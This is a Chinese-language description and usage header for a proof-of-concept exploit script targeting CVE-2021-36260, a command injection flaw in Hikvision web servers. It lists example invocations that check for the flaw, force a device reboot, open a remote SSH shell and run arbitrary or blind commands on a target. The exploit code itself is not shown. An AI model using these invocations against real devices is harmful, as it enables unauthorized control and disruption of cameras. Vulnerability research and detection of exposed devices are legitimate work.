CVE-2021-36260 POC 命令注入漏洞,影响部分海康威视产品的 web 服务器。由于输入验证不足,攻击者可以通过发送带有恶意命令的消息来利用该漏洞发起命令注入攻击。
漏洞标题:海康威视 Web 服务器 Build 210702 - 命令注入
漏洞作者:bashis -- 由 shubtheone 更新错误
厂商主页:https://www.hikvision.com/
版本:1.0
CVE:CVE-2021-36260
参考:https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
注意: 1) 此代码 不会 验证远程设备是否为海康威视设备。 2) 我对此代码的大部分兴趣集中在如何可靠地检测存在漏洞和/或可利用的设备。 有些设备易于检测、验证和利用漏洞, 其他设备可能易受攻击,但不太容易验证和利用。 我认为组合的验证代码应该具有非常高的准确性。 3) '安全检测'(--check)将尝试写入并读取以进行验证 '非安全检测'(--reboot)将尝试重启设备以进行验证
[示例] 安全漏洞/验证检测: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
安全与非安全漏洞/验证检测: (仅在未通过'安全检测'验证时使用'非安全检测') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
非安全漏洞/验证检测: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
启动并连接 SSH shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
执行命令: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
执行盲命令: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"